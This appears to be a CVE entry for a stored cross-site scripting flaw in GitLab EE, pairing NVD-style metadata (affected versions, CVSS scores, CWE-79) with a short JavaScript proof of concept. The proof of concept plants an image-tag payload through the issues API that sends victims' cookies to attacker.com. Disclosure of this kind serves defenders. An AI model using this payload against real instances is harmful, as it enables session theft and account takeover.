CVE-2026-7481

// Conceptual PoC for Stored XSS in GitLab // Attacker injects payload via API or UI const maliciousPayload = '<img src=x onerror=fetch(\'https://attacker.com/steal?c=\'+document.cookie)>'; // Simulating the request to store the payload fetch('https://gitlab.example.com/api/v4/projects/1/issues', { method: 'POST', headers: { 'Content-Type': 'application/json', 'Authorization': 'Bearer <ATTACKER_TOKEN>' }, body: JSON.stringify({ title: 'Important Issue', description: maliciousPayload }) }).then(response => console.log('Payload injected')); // When a victim views the issue, the script executes and exfiltrates cookies.

{"cve": {"id": "CVE-2026-7481", "sourceIdentifier": "[email protected]", "published": "2026-05-14T06:16:25.660", "lastModified": "2026-05-14T18:50:42.700", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "GitLab has remediated an issue in GitLab EE affecting all versions from 16.4 before 18.9.7, 18.10 before 18.10.6, and 18.11 before 18.11.3 that could have allowed an authenticated user with developer-role permissions to execute arbitrary JavaScript in other users' browsers due to improper input sanitization."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 5.8}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "16.4.0", "versionEndExcluding": "18.9.7", "matchCriteriaId": "ACF146E3-AD48-4493-89F1-2F26D172A4C6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "18.10.0", "versionEndExcluding": "18.10.6", "matchCriteriaId": "E79D4F10-88B3-4AA7-BC5E-3FC8FA698969"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "18.11.0", "versionEndExcluding": "18.11.3", "matchCriteriaId": "DA0D6580-3530-4D76-81CE-D852BCE0D411"}]}]}], "references": [{"url": "https://about.gitlab.com/releases/2026/05/13/patch-release-gitlab-18-11-3-released/", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://gitlab.com/gitlab-org/gitlab/-/work_items/598646", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://hackerone.com/reports/3697379", "source": "[email protected]", "tags": ["Permissions Required"]}]}}